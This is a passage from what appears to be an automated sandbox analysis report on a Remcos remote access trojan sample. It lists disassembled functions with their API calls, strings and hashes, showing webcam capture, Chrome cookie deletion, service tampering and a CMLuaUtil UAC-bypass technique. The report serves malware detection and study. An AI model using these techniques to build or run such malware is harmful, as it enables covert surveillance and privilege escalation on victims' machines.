                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                                                        • int.LIBCPMT ref: 0040FC0F
                                                                                                          • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                          • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                        • String ID: P[G
                                                                                                        • API String ID: 2536120697-571123470
                                                                                                        • Opcode ID: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                                                        • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                                                                        • Opcode Fuzzy Hash: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                                                        • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                                                                        Function 0044FCDB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                                                                        • _free.LIBCMT ref: 0044FD29
                                                                                                          • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                          • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                        • _free.LIBCMT ref: 0044FD34
                                                                                                        • _free.LIBCMT ref: 0044FD3F
                                                                                                        • _free.LIBCMT ref: 0044FD93
                                                                                                        • _free.LIBCMT ref: 0044FD9E
                                                                                                        • _free.LIBCMT ref: 0044FDA9
                                                                                                        • _free.LIBCMT ref: 0044FDB4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                        • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                                                                        • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                        • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                                                                        Function 00406815 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe), ref: 00406835
                                                                                                          • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                                          • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                        • CoUninitialize.OLE32 ref: 0040688E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InitializeObjectUninitialize_wcslen
                                                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                        • API String ID: 3851391207-3324213274
                                                                                                        • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                        • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                                                        • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                        • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                                                        Function 0040FED2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                                                        • int.LIBCPMT ref: 0040FEF2
                                                                                                          • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                          • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                        • String ID: H]G
                                                                                                        • API String ID: 2536120697-1717957184
                                                                                                        • Opcode ID: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                                                        • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                                                                        • Opcode Fuzzy Hash: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                                                        • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                                                                        Function 0040B2A8 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                                        • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                                        Strings
                                                                                                        • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                                        • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                                        • [Chrome Cookies not found], xrefs: 0040B308
                                                                                                        • UserProfile, xrefs: 0040B2B4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DeleteErrorFileLast
                                                                                                        • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                        • API String ID: 2018770650-304995407
                                                                                                        • Opcode ID: ec592ed9ccf4b9a5ae27431b7db5c03baafcaff9f2a5fd094053063a907b4898
                                                                                                        • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                                                                        • Opcode Fuzzy Hash: ec592ed9ccf4b9a5ae27431b7db5c03baafcaff9f2a5fd094053063a907b4898
                                                                                                        • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                                                                        Function 0041BEB0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                                                                        • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Console$AllocOutputShowWindow
                                                                                                        • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                                                                        • API String ID: 2425139147-2527699604
                                                                                                        • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                                        • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
                                                                                                        • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                                        • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                                                                                                        Function 004064D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • BG, xrefs: 00406909
                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, xrefs: 00406927
                                                                                                        • (CG, xrefs: 0040693F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$BG
                                                                                                        • API String ID: 0-1344005379
                                                                                                        • Opcode ID: b7a2e59ac2a9b4cfd69ae58ffa53ef09c4b6135ca76893af750d01e39a00b3fe
                                                                                                        • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                                                        • Opcode Fuzzy Hash: b7a2e59ac2a9b4cfd69ae58ffa53ef09c4b6135ca76893af750d01e39a00b3fe
                                                                                                        • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                                                        Function 004395FC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __allrem.LIBCMT ref: 00439789
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                                                                        • __allrem.LIBCMT ref: 004397BC
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                                                                        • __allrem.LIBCMT ref: 004397F1
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                        • String ID:
                                                                                                        • API String ID: 1992179935-0
                                                                                                        • Opcode ID: 088a2e1066119da7e611ebb0c50ba568729b81e5e50e163a33f94ab824c18df8
                                                                                                        • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                                                                        • Opcode Fuzzy Hash: 088a2e1066119da7e611ebb0c50ba568729b81e5e50e163a33f94ab824c18df8
                                                                                                        • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                                                                        Function 00444B3D Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __cftoe
                                                                                                        • String ID:
                                                                                                        • API String ID: 4189289331-0
                                                                                                        • Opcode ID: 20c88ef437a120485069e82cad4792bbc61779312f3e169af31805832c4ed2ab
                                                                                                        • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                                                                        • Opcode Fuzzy Hash: 20c88ef437a120485069e82cad4792bbc61779312f3e169af31805832c4ed2ab
                                                                                                        • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                                                                        Function 00446159 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __freea$__alloca_probe_16
                                                                                                        • String ID: a/p$am/pm
                                                                                                        • API String ID: 3509577899-3206640213
                                                                                                        • Opcode ID: d47145a3bc1b7d9653af932916ed6ede224238620767b4a39004040ccf91a16a
                                                                                                        • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                                                                        • Opcode Fuzzy Hash: d47145a3bc1b7d9653af932916ed6ede224238620767b4a39004040ccf91a16a
                                                                                                        • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                                                                        Function 00403DE7 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 135sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                                                          • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: H_prologSleep
                                                                                                        • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                                                                        • API String ID: 3469354165-462540288
                                                                                                        • Opcode ID: 25a0f4193d6ce9d903107b1be8cfd58e430ba9181b3007ec8c1f7c1118c42728
                                                                                                        • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                                                                        • Opcode Fuzzy Hash: 25a0f4193d6ce9d903107b1be8cfd58e430ba9181b3007ec8c1f7c1118c42728
                                                                                                        • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                                                                        Function 00419DEC Relevance: 9.1, APIs: 6, Instructions: 66serviceCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                                                                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                        • String ID:
                                                                                                        • API String ID: 493672254-0
                                                                                                        • Opcode ID: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
                                                                                                        • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                                                                        • Opcode Fuzzy Hash: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
                                                                                                        • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                                                                                                        Function 00437E06 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                                                                        • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                        • String ID:
                                                                                                        • API String ID: 3852720340-0
                                                                                                        • Opcode ID: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                                                                                        • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                                                                        • Opcode Fuzzy Hash: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                                                                                        • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                                                                        Function 00446EBF Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                        • _free.LIBCMT ref: 00446EF6
                                                                                                        • _free.LIBCMT ref: 00446F1E
                                                                                                        • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                        • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                        • _abort.LIBCMT ref: 00446F3D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                        • String ID:
                                                                                                        • API String ID: 3160817290-0
                                                                                                        • Opcode ID: ee081b98001fac20135d606adf3ebd9ed25e83f06873042332f69cc5cc1fb8f1
                                                                                                        • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                                                                        • Opcode Fuzzy Hash: ee081b98001fac20135d606adf3ebd9ed25e83f06873042332f69cc5cc1fb8f1
                                                                                                        • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                                                                        Function 00419C20 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                        • String ID:
                                                                                                        • API String ID: 221034970-0
                                                                                                        • Opcode ID: 8c2c12d76111034d1ffd754af595e71f441d69217dbef0b08bd463c672326562
                                                                                                        • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                                                                        • Opcode Fuzzy Hash: 8c2c12d76111034d1ffd754af595e71f441d69217dbef0b08bd463c672326562
                                                                                                        • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                                                                        Function 00419D22 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                                                                        • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                        • String ID:
                                                                                                        • API String ID: 221034970-0
                                                                                                        • Opcode ID: d7e55e87c4aa5de171478471ca9946ff37ffda1a29cecfda88707176146ab33a
                                                                                                        • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                                                                        • Opcode Fuzzy Hash: d7e55e87c4aa5de171478471ca9946ff37ffda1a29cecfda88707176146ab33a
                                                                                                        • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                                                                        Function 00419D87 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                                                                        • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                        • String ID:
                                                                                                        • API String ID: 221034970-0
                                                                                                        • Opcode ID: b25a7e1b6f2a79e6a708b03e077db022cb2e93733ffc263c18ea91644c8a084d
                                                                                                        • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                                                                        • Opcode Fuzzy Hash: b25a7e1b6f2a79e6a708b03e077db022cb2e93733ffc263c18ea91644c8a084d
                                                                                                        • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                                                                                                        Function 004129AA Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 173registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Enum$InfoQueryValue
                                                                                                        • String ID: [regsplt]$DG
                                                                                                        • API String ID: 3554306468-1089238109
                                                                                                        • Opcode ID: 668e6125bc102b06f08f4022fce7d3e72e6b7aa882a9d0668b883ab2701ec6ad
                                                                                                        • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                                                                        • Opcode Fuzzy Hash: 668e6125bc102b06f08f4022fce7d3e72e6b7aa882a9d0668b883ab2701ec6ad
                                                                                                        • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                                                        Function 0040AE58 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 87COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
